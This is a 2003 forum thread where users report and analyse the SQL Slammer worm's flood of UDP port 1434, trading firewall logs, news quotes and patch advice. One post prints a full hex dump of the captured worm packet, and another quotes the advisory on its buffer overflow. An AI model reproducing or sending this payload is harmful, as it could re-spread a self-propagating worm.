Just the first of many big companies to suffer i bet.]]> http://www.dslreports.com/forum/remark,5774513 Sat, 25 Jan 2003 10:47:20 EDT http://www.dslreports.com/forum/remark,5774253 Mr Steveo : Same here. Nothing before 1:00am EST (GMT-5)

Once 1:00am came, wooooosh!!, the flood of 1434 began.

Call me weird but at first I thought it was kind of cool, for once soemthing was taking up more space in my logs than port 137 :D :D]]> http://www.dslreports.com/forum/remark,5774253 Sat, 25 Jan 2003 10:14:40 EDT http://www.dslreports.com/forum/remark,5774124 Sparrow : I have not been able to log on to numerous tech support sites. Thanks to all who have posted here.

I started the thread in Microsoft help:

»[XP] Tech Forum Links Not Workin

and was redirected to this thread here.

--
Crystal Sky
[text was edited by author 2003-01-25 09:59:28]

[text was edited by author 2003-01-25 09:59:59]]]> http://www.dslreports.com/forum/remark,5774124 Sat, 25 Jan 2003 09:54:47 EDT http://www.dslreports.com/forum/remark,5774113 sctech29169 : News on THIS SQL Worm from AP broke just over an hour age.

»story.news.yahoo.com/news?tmpl=s···t_attack

It has also struck Asia and Europe.]]> http://www.dslreports.com/forum/remark,5774113 Sat, 25 Jan 2003 09:53:28 EDT http://www.dslreports.com/forum/remark,5773846 anon : I have been getting hit since about 1:00 am eastern time and have seen several edu listed inluding albany.edu, California sate in Fresno, University of Kentuck, and several others.

Also got a few from Latin America and Mexico areas]]> http://www.dslreports.com/forum/remark,5773846 Sat, 25 Jan 2003 09:16:24 EDT http://www.dslreports.com/forum/remark,5773730 stev32k : I'm getting about 100 hits per hour and it seems to be increasing. The activity light on my modem is flashing like I'm downloading a large file.

I'm not having any trouble accessing web sites including ebay. Even the South Korean sites are responding normally. ]]> http://www.dslreports.com/forum/remark,5773730 Sat, 25 Jan 2003 08:55:12 EDT http://www.dslreports.com/forum/remark,5773724 CPUYODA : Its getting worse or equaling out,depends on your location.My guess is its creeping around the planet.

Im getting diff addresses from the same DNS,weird.
Also the TCP scans are coming from Deutchland.

adserv00x.adtech.de

Looks like its infected a damn advert server,a fast and un patched one.]]> http://www.dslreports.com/forum/remark,5773724 Sat, 25 Jan 2003 08:54:22 EDT http://www.dslreports.com/forum/remark,5773719 anon : You should probably get a new colo as the patch came out about 6 months ago. Not a good sign if they're not patched.]]> http://www.dslreports.com/forum/remark,5773719 Sat, 25 Jan 2003 08:53:28 EDT http://www.dslreports.com/forum/remark,5773684 vic102482 : Look at my log

Whats "unrecognized access"? My router was on but no computers were on at those times. So did the packets get into the LAN or were they still dropped at the gateway? I dont know how when I have no ports forwarded.


Edit: Unrecognized access IMO means still got into network but didnt come from a recognized source, but there is no way they could have gotten in, I dont have any machines on the service. I think its just bad english from whoever programmed it. When I select an opition is says "Effective are actions immeditatly" so I am just hoping its a wording screw up lol.

Saturday, January 25, 2003 2:05:04 AM Unrecognized access from 207.46.200.167:2103 to UDP port 1434

[text was edited by author 2003-01-25 09:15:52]
]]> http://www.dslreports.com/forum/remark,5773684 Sat, 25 Jan 2003 08:46:45 EDT http://www.dslreports.com/forum/remark,5773672 PDXracer : Things seemed to get better around 2am PST when I decided I could no longer do anything online.

Just woke up and am catching up on things, and the scans on my firewall have TWICE the amount of activity in the past 45 minutes than I have had in the previous 6 hours.

This thing is still crunching and growing it seems.

I cannot access 85% + of the websites I frequent, and cant even get Yahoo to open. My Ebay auctions are also having problems with hosted photos I have on them.]]> http://www.dslreports.com/forum/remark,5773672 Sat, 25 Jan 2003 08:43:52 EDT http://www.dslreports.com/forum/remark,5773618 Turdicus Sr :

said by stev32k :

---

The BBC is reporting that the South Korean internet was shut-down for some period of time because of the attacks. Here's a link if anyone is interested.

»news.bbc.co.uk/2/hi/technology/2693925.stm

---

I was wondering why I had no connection today.
--
Homestarrunner.net It's dot com!!]]> http://www.dslreports.com/forum/remark,5773618 Sat, 25 Jan 2003 08:31:28 EDT http://www.dslreports.com/forum/remark,5773592 stev32k : The BBC is reporting that the South Korean internet was shut-down for some period of time because of the attacks. Here's a link if anyone is interested.

»news.bbc.co.uk/2/hi/technology/2693925.stm]]> http://www.dslreports.com/forum/remark,5773592 Sat, 25 Jan 2003 08:24:45 EDT http://www.dslreports.com/forum/remark,5773549 CPUYODA : Then again they may,Im getting them now as often as the UDP scans.
Its a pretty random IP addy that tries.Id say the two are connected in some way.

Im running ZA on Stealth on my (game)server rig,rest is NAT'ed.

BTW:
I dont run edonkey.
But thanks for the info...
[text was edited by author 2003-01-25 08:14:47]
]]> http://www.dslreports.com/forum/remark,5773549 Sat, 25 Jan 2003 08:11:34 EDT http://www.dslreports.com/forum/remark,5773548 Tablet :

said by Kr0m :

---

YEah, I posted that link... see above..

---

I know, I've just reposted it in IP address format so that Marilla could see it whilst he can't do DNS lookup :D]]> http://www.dslreports.com/forum/remark,5773548 Sat, 25 Jan 2003 08:11:19 EDT http://www.dslreports.com/forum/remark,5773510 Kr0m : YEah, I posted that link... see above..
--
Fredericton, New Brunswick, Canada]]> http://www.dslreports.com/forum/remark,5773510 Sat, 25 Jan 2003 07:57:28 EDT http://www.dslreports.com/forum/remark,5773509 Mem :

said by CPUYODA :

---

Im getting a 4661-4694 port scan now.

---

These ports are the normal edonkey P2P ones. They may not be part of this worm.]]> http://www.dslreports.com/forum/remark,5773509 Sat, 25 Jan 2003 07:57:09 EDT http://www.dslreports.com/forum/remark,5773498 mastermind278 : Humm, can Kevin Mitnick be responsible? ;-) Would be interesting to hear his view on this...
--
Mastermind 4 Life ® ™ ©

[text was edited by author 2003-01-25 07:55:21]
]]> http://www.dslreports.com/forum/remark,5773498 Sat, 25 Jan 2003 07:54:52 EDT http://www.dslreports.com/forum/remark,5773494 Rick G0 : I love the quote from our homeland security gurus who define this as "... not debilitating ..." in the CNN article.]]> http://www.dslreports.com/forum/remark,5773494 Sat, 25 Jan 2003 07:53:49 EDT http://www.dslreports.com/forum/remark,5773493 Marilla : Woo!! Thank you again, Tablet!

Here is the reason for my happiness:

...the Slammer worm is not destructive to the infected host...

I'll take this as a warning to be EVEN MORE DILIGENT about this sort of thing (I *still* want to know why I never recieved any of my notifications about SP3 when I normally get them all - but anyone here would be correct to point out it is MY responsibility to check into these things!)]]> http://www.dslreports.com/forum/remark,5773493 Sat, 25 Jan 2003 07:52:52 EDT http://www.dslreports.com/forum/remark,5773484 CPUYODA : Other than dead sites,Im fine.

LOTS of UDP and NOW TCP traffic?!?

Im getting a 4661-4694 port scan now.
My bet is that they will be calling this
"THE BIGGEST ATTACK EVER!!!" by 6'oclock news.]]> http://www.dslreports.com/forum/remark,5773484 Sat, 25 Jan 2003 07:50:12 EDT http://www.dslreports.com/forum/remark,5773478 Tablet :

said by Marilla :

---

Argh!

Okay.. someone give me an IP for bvlive01.iss.net or www.eeye.com! :P

---

Here it goes, click on this link..
»209.134.161.15/issEn/delivery/xf···id=21824]]> http://www.dslreports.com/forum/remark,5773478 Sat, 25 Jan 2003 07:47:05 EDT http://www.dslreports.com/forum/remark,5773471 Kr0m :

said by Marilla :

---

said by CPUYODA :

---

someone had to call em and tell em what its doing....

---

It's kinda funny to hear mainstream press report on this sorta thing; it's just funny to hear the mis-use of terms, in particular.

Well, it's funnier when I know I'm safe from what they're talking about... so hopefully this evening, it'll be funny to me ;)

---

Yeah, hopefully it won't get worse, I have friends that are totally bogged down in the US that can hardly do anything on their highspeed connection. Worse than dialup.
--
Fredericton, New Brunswick, Canada]]> http://www.dslreports.com/forum/remark,5773471 Sat, 25 Jan 2003 07:45:01 EDT http://www.dslreports.com/forum/remark,5773464 Marilla :

said by CPUYODA :

---

someone had to call em and tell em what its doing....

---

It's kinda funny to hear mainstream press report on this sorta thing; it's just funny to hear the mis-use of terms, in particular.

Well, it's funnier when I know I'm safe from what they're talking about... so hopefully this evening, it'll be funny to me ;)]]> http://www.dslreports.com/forum/remark,5773464 Sat, 25 Jan 2003 07:41:53 EDT http://www.dslreports.com/forum/remark,5773460 CPUYODA : Trust me its a sig:)

I was just wandering because nobody said for sure,,

CNN is on it now,Norton had to call em and tell em what its doing....


[text was edited by author 2003-01-25 07:40:01]

[text was edited by author 2003-01-25 07:40:59]
]]> http://www.dslreports.com/forum/remark,5773460 Sat, 25 Jan 2003 07:38:51 EDT http://www.dslreports.com/forum/remark,5773459 mastermind278 : This is crazy my router log is FULL and keeps going up,

I am getting an attack every 2-10 seconds. Crazy, good thing it all ends at the ROUTER, noting on my ZAP log.
--
Mastermind 4 Life ® ™ © ]]> http://www.dslreports.com/forum/remark,5773459 Sat, 25 Jan 2003 07:38:38 EDT http://www.dslreports.com/forum/remark,5773457 Marilla : Argh!

Okay.. someone give me an IP for bvlive01.iss.net or www.eeye.com! :P]]> http://www.dslreports.com/forum/remark,5773457 Sat, 25 Jan 2003 07:38:18 EDT http://www.dslreports.com/forum/remark,5773452 Kr0m : More info on the worm here:
»bvlive01.iss.net/issEn/delivery/···id=21824
--
Fredericton, New Brunswick, Canada]]> http://www.dslreports.com/forum/remark,5773452 Sat, 25 Jan 2003 07:37:00 EDT http://www.dslreports.com/forum/remark,5773421 Marilla :

said by CPUYODA :

---

Im kissing my router,
Anyone get an idea if its a worm,virus,trojan or a combo?

Cheers!!!

---

Well hell, my HOME connection is fine... aside from difficulty getting DNS responses on some sites that I haven't viewed lately (and therefore are not cached) I have no trouble here... I have a server with SQL Server sitting back here that was also unpatched (it's patched now) which was safe because of the NAT function of the router, but ALSO because again, following best practices... SQL Server was shut OFF because it wasn't currently in use. I use the server to test stuff... when I'm testing, the SQL service is on.. when I'm not, it's not. For little Web-based stuff I do here that needs constant access, I use Access so that SQL Server doesn't need to be running at all times.

You know, I sure HOPE that "Cheers!!!" thing is a sig, and you aren't typing that in each time with these posts this morning... hehe..

Well it's pretty clear it's a worm. It's also pretty clear it's NOT a trojan (though it's possible it was initially started by a trojan). Whether it's a virus or not probably depends on what it tries to do to keep itself around 'permanently' on the server it infects.]]> http://www.dslreports.com/forum/remark,5773421 Sat, 25 Jan 2003 07:24:14 EDT http://www.dslreports.com/forum/remark,5773410 CPUYODA : Im kissing my router,
Anyone get an idea if its a worm,virus,trojan or a combo?

Cheers!!!]]> http://www.dslreports.com/forum/remark,5773410 Sat, 25 Jan 2003 07:18:29 EDT http://www.dslreports.com/forum/remark,5773406 Marilla : Much obliged, Tab!
[text was edited by author 2003-01-25 07:16:58]
]]> http://www.dslreports.com/forum/remark,5773406 Sat, 25 Jan 2003 07:16:48 EDT http://www.dslreports.com/forum/remark,5773399 Tablet : This is what it says:

WASHINGTON (AP) -- Traffic on many parts of the Internet slowed dramatically early Saturday, the apparent effects of a fast-spreading, virus-like infection overwhelming the world's digital pipelines and interfering with Web browsing and delivery of e-mail.

Sites monitoring the health of the Internet reported significant slowdowns globally. Experts said the latest electronic attack bore remarkable similarities to "Code Red" virus during the summer of 2001 which also ground traffic to a halt on much of the Internet.

"It's not debilitating," said Howard Schmidt, President Bush's No. 2 cyber-security adviser. "Everybody seems to be getting it under control." Schmidt said the FBI's National Infrastructure Protection Center and private experts at the CERT Coordination Center were monitoring the attacks.

The virus-like attack sought out vulnerable computers to infect on the Internet using a known flaw in popular database software from Microsoft Corp., called "SQL Server." But the attacking software code was scanning for victim computers so randomly and so aggressively -- sending out thousands of probes each second -- that it overwhelmed many Internet data pipelines.

"This is like Code Red all over again," said Marc Maiffret, an executive with eEye Digital Security, whose engineers were among the earliest to study samples of the attack software. "The sheer number of attacks is eating up so much bandwidth that normal operations can't take place."

The attack sought to take advantage of a software flaw discovered in July 2002 that permits hackers to infect corporate database servers. Microsoft deemed the problem "critical" and offered a free repairing patch, but it was impossible to know how many computer administrators applied the fix.

"People need to do a better job about fixing vulnerabilities," Schmidt said]]> http://www.dslreports.com/forum/remark,5773399 Sat, 25 Jan 2003 07:15:09 EDT http://www.dslreports.com/forum/remark,5773394 Marilla :

said by Mem :

---

It just did - »www.cnn.com/2003/TECH/internet/0···dex.html

---

How about just a tiny quote for those of us who don't have cnn.com's DNS info cached and, therefore, are unable to view the site.. *grumbles*

or just post the IP and I'll enter it in my hosts file.. hehe
[text was edited by author 2003-01-25 07:15:17]]]> http://www.dslreports.com/forum/remark,5773394 Sat, 25 Jan 2003 07:13:32 EDT http://www.dslreports.com/forum/remark,5773383 Mem :

said by TeenTech$ :

---

I am kinda shocked none of this has made it on CNN or another station yet.

---

It just did - »www.cnn.com/2003/TECH/internet/0···ex.html


Edit: As stated in the article-
--snip--
[text was edited by author 2003-01-25 07:16:50]

OK, Tablet beat me to it-types faster.... :)
[text was edited by author 2003-01-25 07:19:43]

[text was edited by author 2003-01-25 08:00:27]]]> http://www.dslreports.com/forum/remark,5773383 Sat, 25 Jan 2003 07:10:26 EDT http://www.dslreports.com/forum/remark,5773362 Marilla : You are right about the not-patching thing. In fact, when Code Red came out, I had a server then not yet patched for it. Yet again (as is likely here) I avoided any real problems by otherwise following best-practices; In this case, the things that prevented Code Red from having any effect on my server that wasn't patched was that the vulnerable service was not installed, because it wasn't being used, and I also used 'host headers' on the site, which completely prevented Code Red from even getting a response.

In this case, it seems like a strong permissions policy will likely prevent any long-term trouble (I'm hoping!)...

Basically the point is: Patching is not enough. In FACT, I can remember maybe three vulnerabilities that Microsoft announced over the past year that did not have patches available - instead, it required taking steps toward fixing things.

One issue I have here is that port 1434 was exposed at all (and I have verified that it was by port scanning); my co-location provider controls the firewall, and it's a little surprising to me that they opened that port when I do know that they keep 1433 closed. What I would REALLY like is to have my own hardware firewall dedicated to my server so that I can keep EVERYTHING closed, except that which I *know* is in use and, therefore, is something I know I should be watching.

I'm also wondering why it is that I did not get any notifications about SP3 when I get every other notification... or at least, I *thought* I did. I would also like to see an update site for SQL Server much like Office/Windows have... that scans automatically for required updates and permits installation of them.

Bleh... I'm still holding out hope that once they shut down and reboot everything, and close that darn port, everything will be OK (for me)]]> http://www.dslreports.com/forum/remark,5773362 Sat, 25 Jan 2003 07:03:19 EDT http://www.dslreports.com/forum/remark,5773347 TeenTech$ : I am kinda shocked none of this has made it on CNN or another station yet.

This is some serious crap. I was doing a google search, tons of websites don't work.. In my Fav's.. Several websites are down. Also, The local college website was hit, so was the local church, and one of the realtors outta my aunts office site was hit as well.. OH yeah, Launch.yahoo.com was hit too it seems...

It's REALLY Killing the internet.. Alot of sites are dead... Sucks. MSN Messenger is not working for me. I am streaming a online radion and it just stopped for a few secs for no reason, then shortly after that AIM disconnected me... Jesus... Also, My connection seems slower than crap sometimes... Even here at DSLR.. I fell like I am sharing on Kazza right now.. Stuff loads fast, but it's just GETTING it to load.. I am thinking it's a DNS server lagging badly.

Man, This sucks :-(]]> http://www.dslreports.com/forum/remark,5773347 Sat, 25 Jan 2003 06:56:37 EDT http://www.dslreports.com/forum/remark,5773332 Link Logger : It is a 'old' (meaning 7 months) vul that has had a hot patch available for sometime (again 7 months) and was included in SP3 recently. The fact remains people do not patch. Code Red and Nimda were also examples of people not patching. Why people don't patch is the question. It doesn't really matter what you run, patching is a fact of life. Also why people insist in 'hanging it all out there' is beyond me. Certainly not this many people need to expose SQL Monitor on the internet, but apparently they did.

The worm appears to have some DOS components targeted at several backbone locations, which would explain why some areas seem to have been crushed, while others seem to have gotten off rather lightly.

I have two questions that I left with one investigation team working on this. First are there any data corruption or deletion/etc issues related to this worm. Second is there another motive involved here. I know this wasn't the ideal first day on the job for Tom Ridge and the Homeland defense to have the internet beaten up. I hope that by the time I wake up later this morning that there will be some answers, as I trust there will be.

As always DSLReports has proven yet once again that it is a leader on the internet and that this discussion forum rocks with some of the most heads up security guys going, thanks everyone.

Blake]]> http://www.dslreports.com/forum/remark,5773332 Sat, 25 Jan 2003 06:43:22 EDT http://www.dslreports.com/forum/remark,5773297 Marilla :

said by woodward :

---

...those silly fools running M$ products?

---

If people are right here, this vulnerability was 'exposed' about 7 months ago, as you say.

Trouble is, a service pack was released AFTER that which I (and perhaps others who think they keep up on this sort of thing) believed included prior hotfixes. If you read the description of the hotfix itself, it says it "will be included in SP3"... but basically that means having to go back through ALL of the hotfixes to see if they say they are included in the sp you are installing or not.

Note that this is different than 'keeping up' with hotfixes. I generally apply hotfixes the moment I know of them. Interestingly, though, I never got a notification from MS about SP3. I sure know about it, now.

As it is, though, I MAY still be OK, depending on exactly what this worm tries to do; Even running in the context of the SQL Service itself, if it tries to write certain things to disk to survive a reboot, it may not have permissions to do so because I do try to be careful about what has permissions to do what... we'll see later in the morning, though.]]> http://www.dslreports.com/forum/remark,5773297 Sat, 25 Jan 2003 06:26:02 EDT http://www.dslreports.com/forum/remark,5773285 robre : Apparently it begins constructing the packet in the shellcode itself. This thing should only exist in memory. m0rk mentioned this before. I haven't looked at it too long but I disassembled the payload and was able to find where it begins building the packet in the stack and pushes 24 0x0101s. I haven't counted how many there are in the packet, but I know this isn't enough. I have yet to find where it gets the 0x04. I'm guessing you would need a honeypot with softice and MS SQL 2000 to really tell what's really going on here as to how it chooses what address to try next and all that other stuff. I have never seen either one of those software packages before in my life, nor do I have the resources to acquire them. I'm just starting assembly so I'm not that great at reading other people's code and even if I had those things it probably wouldn't help. One of the antivirus companies should release a thing about it if your curious, but antivirus software is pretty much useless in this context because I don't think the code ever spawns another process. Antivirus software is pretty useless anyways unless you are worried about bomb.exe or win32.msnmessengertrojan.a.]]> http://www.dslreports.com/forum/remark,5773285 Sat, 25 Jan 2003 06:20:52 EDT http://www.dslreports.com/forum/remark,5773283 woodward : OK. So let's decipher this. Apparently this is an 7 month old exploit that was "patched" a week ago. And yet it's as close to anything I've seen in years that can take down the internet.

All you home users talking about your 100 hits an hour, please pardon us, I'm interested in the view of other net admins that have haunted this forum.

What is this, exactly? Did the SP3 for MS SQL that was just released last week finally expose a new vulnerability that we were not aware of? I can't believe this magnitude of influence would happen on an old exploit. Though, it is equally odd that a brand new exploit would hit this fast. So, what are we seeing here? Outside the port block, what's the fix to those silly fools running M$ products?]]> http://www.dslreports.com/forum/remark,5773283 Sat, 25 Jan 2003 06:20:14 EDT http://www.dslreports.com/forum/remark,5773273 BOFH5 : Ok folks,

This looks related to:

»www.cert.org/incident_notes/IN-2001-13.html
»www.cert.org/incident_notes/IN-2002-04.html

Best advice available right now block all in/out on you msSQL server boxes and wait for it to blow over/patch. I'm told to assume that even patched boxes are hosed at this point. If it is related to either of those worms it would be a good idea to go through your email/logs...

Pity Dallas UUnet right now]]> http://www.dslreports.com/forum/remark,5773273 Sat, 25 Jan 2003 06:16:12 EDT http://www.dslreports.com/forum/remark,5773267 CPUYODA : I am still getting nailed as well,just think how bad it would be if zonealarm wasnt free!!!!

The same address is still hitting me,I guess peep in Asia cant get upgrades fast enough.

Cheers!!]]> http://www.dslreports.com/forum/remark,5773267 Sat, 25 Jan 2003 06:13:05 EDT http://www.dslreports.com/forum/remark,5773230 spamd : *sigh*

I still can't get to half of the internet.

]]> http://www.dslreports.com/forum/remark,5773230 Sat, 25 Jan 2003 05:56:31 EDT http://www.dslreports.com/forum/remark,5773228 oldmangloom : i've been hit over 150 times in the past 24 hours. still happening every few minutes =/
--
stars now beneath our feet]]> http://www.dslreports.com/forum/remark,5773228 Sat, 25 Jan 2003 05:55:02 EDT http://www.dslreports.com/forum/remark,5773193 anon : deleted by a moderator]]> http://www.dslreports.com/forum/remark,5773193 Sat, 25 Jan 2003 05:37:07 EDT http://www.dslreports.com/forum/remark,5773191 CPUYODA : »www.internetpulse.net/1/UUNet_to_UUNet/

That UUNet router or whatever looks broken......

Cheers!!!]]> http://www.dslreports.com/forum/remark,5773191 Sat, 25 Jan 2003 05:35:46 EDT http://www.dslreports.com/forum/remark,5773175 CPUYODA : A pigeon and paper!!!

Cheers!!]]> http://www.dslreports.com/forum/remark,5773175 Sat, 25 Jan 2003 05:30:48 EDT http://www.dslreports.com/forum/remark,5773174 Marilla :

said by Mark :

---

Whats that? 2 tin cans and a long string? ;)

---

Nah.. it's the Pony Express method of packet delivery! or was that PACKAGE delivery? something close.. I dunno; Gets those one-week ping times!!!

Seriously, though... I know we've not had time to look too closely here, but I'm guessing this won't be something I can just reboot the server, apply SP3, and move on... I'm fairly sure there'll be something 'stuck' on the server that I'd have to clean up... and most likely what I'll end up doing is wiping the whole server and reinstalling, then restoring up the databases and stuff. *sigh*

And then, in the future, not ASSUMING that all prior hotfixes are included in a service pack, even if the service pack's webpage seems to suggest just that... *sigh*
[text was edited by author 2003-01-25 05:31:08]
]]> http://www.dslreports.com/forum/remark,5773174 Sat, 25 Jan 2003 05:30:29 EDT http://www.dslreports.com/forum/remark,5773165 Mark : Whats that? 2 tin cans and a long string? ;)]]> http://www.dslreports.com/forum/remark,5773165 Sat, 25 Jan 2003 05:26:16 EDT http://www.dslreports.com/forum/remark,5773163 Marilla : Well, I guess we finally get to test my backup strategy. hehe]]> http://www.dslreports.com/forum/remark,5773163 Sat, 25 Jan 2003 05:25:31 EDT http://www.dslreports.com/forum/remark,5773146 anon : Dallas UUNET node is completely dead, PDXracer, I suggest not attempting to route via UUNET if that's what you're going through.

-- Daerk

]]> http://www.dslreports.com/forum/remark,5773146 Sat, 25 Jan 2003 05:15:03 EDT http://www.dslreports.com/forum/remark,5773138 CPUYODA : I just got nailed on my firewall,heres the results:


Final results obtained from whois.apnic.net.
Results:
% [whois.apnic.net node-1]
% How to use this server »www.apnic.net/db/
% Whois data copyright terms »www.apnic.net/db/dbcopyright.html

inetnum: 210.202.0.0 - 210.202.255.255
netname: APOL
descr: Asia Pacific On-line Services Inc.
descr: Internet Service Provider
descr: Taipei, Taiwan
country: TW
admin-c: AA91-AP
tech-c: AA91-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TW-APOL
changed: hm-changed@apnic.net 20021217
status: ALLOCATED PORTABLE
source: APNIC

person: Admin APOL
nic-hdl: AA91-AP
e-mail: adm@apol.com.tw
address: 8F,No19-5,Sanchong Rd.,Nankang Dist.,Taipei,Taiwan,R.O.C.
phone: +886-2-55813300
fax-no: +886-2-26551515
country: TW
changed: adm@apol.com.tw 20021104
mnt-by: MAINT-TW-APOL
source: APNIC]]> http://www.dslreports.com/forum/remark,5773138 Sat, 25 Jan 2003 05:07:49 EDT http://www.dslreports.com/forum/remark,5773105 CPUYODA : »www.internetpulse.net/1/

Internet is dead......

Weird,I guess the FBI guys will be called in today.

Cheers!!
[text was edited by author 2003-01-25 04:51:03]]]> http://www.dslreports.com/forum/remark,5773105 Sat, 25 Jan 2003 04:49:17 EDT http://www.dslreports.com/forum/remark,5773099 inTulsa : From: »www.nextgenss.com/advisories/mssql-udp.txt

---

Stack Based Buffer Overflow
*********************************

When SQL Server receives a packet on UDP port 1434 with the first byte set to 0x04, the SQL Monitor thread takes the remaining data in the packet and attempts to open a registry key using this user supplied information. For example, by sending \x04\x41\x41\x41\x41 (0x04 followed by 4 upper case 'A's) SQL Server attempts to open

HKLM\Software\Microsoft\Microsoft SQL Server\AAAA\MSSQLServer\CurrentVersion

By appending a large number of bytes to the end of this packet, whilst preparing the string for the registry key to open, a stack based buffer is overflowed and the saved return address is overwritten. This allows an attacker to gain complete control of the SQL Server process and its path of execution. By overwriting the saved return address on the stack with an address that contains a "jmp esp" or "call esp" instruction, when the vulnerable procedure returns the processor will start executing code of the attacker's choice. At no stage does the attacker need to authenticate.

---

From that, and that all packets I'm seeing are identical and start with \x04, this does not seem to be the Denial Of Service method. Denial Of Service ping method would have \x0A in the 1st byte.

[text was edited by author 2003-01-25 05:03:52]]]> http://www.dslreports.com/forum/remark,5773099 Sat, 25 Jan 2003 04:47:30 EDT http://www.dslreports.com/forum/remark,5773098 jig : 01:47:40pig: IP[Src=195.167.178.244 Dst=24.55.48.160 UDP spo=03194 dpo=01434]}S07>R06nD
01:42:45pig: IP[Src=157.238.135.147 Dst=24.55.48.160 UDP spo=02160 dpo=01434]}S07>R06nD
01:42:02pig: IP[Src=213.132.200.220 Dst=24.55.48.160 UDP spo=04948 dpo=01434]}S07>R06nD
01:42:00pig: IP[Src=152.160.43.242 Dst=24.55.48.160 UDP spo=03361 dpo=01434]}S07>R06nD
01:34:11pig: IP[Src=63.95.45.103 Dst=24.55.48.160 UDP spo=44927 dpo=01434]}S07>R06nD
01:31:48pig: IP[Src=138.23.142.87 Dst=24.55.48.160 UDP spo=02334 dpo=01434]}S07>R06nD
01:31:26pig: IP[Src=212.116.179.158 Dst=24.55.48.160 UDP spo=03295 dpo=01434]}S07>R06nD
01:30:22pig: IP[Src=149.142.75.40 Dst=24.55.48.160 UDP spo=03761 dpo=01434]}S07>R06nD

[text was edited by author 2003-01-25 04:50:24]
]]> http://www.dslreports.com/forum/remark,5773098 Sat, 25 Jan 2003 04:47:15 EDT http://www.dslreports.com/forum/remark,5773090 inTulsa :

said by robre :

---

intulsa could you put a text rather than a graphic of that honeypot grab up?

---

0000 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0040 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	................
0060 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE 	....B.........p.
0070 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 	B.p.B........h..
0080 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 	.B.....1...P..5.
0090 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 	...P..Qh.dllhel3
00A0 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 	2hkernQhounthick
00B0 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 	ChGetTf.llQh32.d
00C0 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 	hws2_f.etQhsockf
00D0 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 	.toQhsend....B.E
00E0 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 	.P..P.E.P.E.P..P
00F0 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 	....B....=U..Qt.
0100 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 	....B....1.QQP..
0110 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B 	..........Q.E.P.
0120 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 	E.P..j.j.j...P.E
0130 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 	.P.E.P........<a
0140 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 	...E...@........
0150 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D 	...).......E.j..
0160 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 	E.P1.Qf..x.Q.E.P
0170 8B 45 AC 50 FF D6 EB CA 	.E.P....

Edit: Previous attempt dropped some lines

[text was edited by author 2003-01-25 04:53:11]
]]> http://www.dslreports.com/forum/remark,5773090 Sat, 25 Jan 2003 04:42:52 EDT http://www.dslreports.com/forum/remark,5773075 Wildcatboy :
Looking at the packets I'm receiving, source ports vary, this excludes the possibility of the mentioned attack from port 1434 to 1434. At least this is not the first attempt by the worm. To see what else is done, we certainly need a honeypot.

I have a feeling too that the worm is using the heap buffer overflow to run codes on the server and then installs itself and does more.

The initial attempt is a DCE RPC protocol ping: seq_num: 16843009 to UDP port 1434.
--
You can catch the Devil, but you can't hold him long.]]> http://www.dslreports.com/forum/remark,5773075 Sat, 25 Jan 2003 04:38:39 EDT http://www.dslreports.com/forum/remark,5773071 robre : intulsa could you put a text rather than a graphic of that honeypot grab up?]]> http://www.dslreports.com/forum/remark,5773071 Sat, 25 Jan 2003 04:35:50 EDT http://www.dslreports.com/forum/remark,5773064 Link Logger : I am starting to see a couple of double hits, meaning that I seeing a second hit from the same IP address. For example

Jan 25, 2003 06:27:56.560 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434
Jan 25, 2003 09:05:41.690 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434

and

Jan 25, 2003 06:25:03.521 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434
Jan 25, 2003 07:45:48.177 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434

which somewhat implies that these systems have been going hard for awhile. Glad I'm not paying the bandwidth bill for these guys.

Going through the list of systems that have scanned me, its sad that some of these guys didn't know better as they are so called leaders in the high tech sector.

Blake]]> http://www.dslreports.com/forum/remark,5773064 Sat, 25 Jan 2003 04:33:45 EDT http://www.dslreports.com/forum/remark,5773061 ircgeeks : Service packs to get we are kind of confused
sql2kasp3.exe 44598 KB sql2ksp3.exe 56435 KB
One is the database one is the analyze server do we need both to fix this problem
--
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra]]> http://www.dslreports.com/forum/remark,5773061 Sat, 25 Jan 2003 04:32:24 EDT http://www.dslreports.com/forum/remark,5773058 foxsteve : I do not distribute copyrighted material and do not use Edonkey2000, Kazaa, Napster or Morpheus, but I use dynamic IP now.
[text was edited by author 2003-01-25 04:34:44]
I reconnected my PC to server and do not have alerts about port 4662 more. Thank you for help.

[text was edited by author 2003-01-25 05:01:13]
]]> http://www.dslreports.com/forum/remark,5773058 Sat, 25 Jan 2003 04:31:36 EDT http://www.dslreports.com/forum/remark,5773055 inTulsa : Some detailed description of how it operates here:
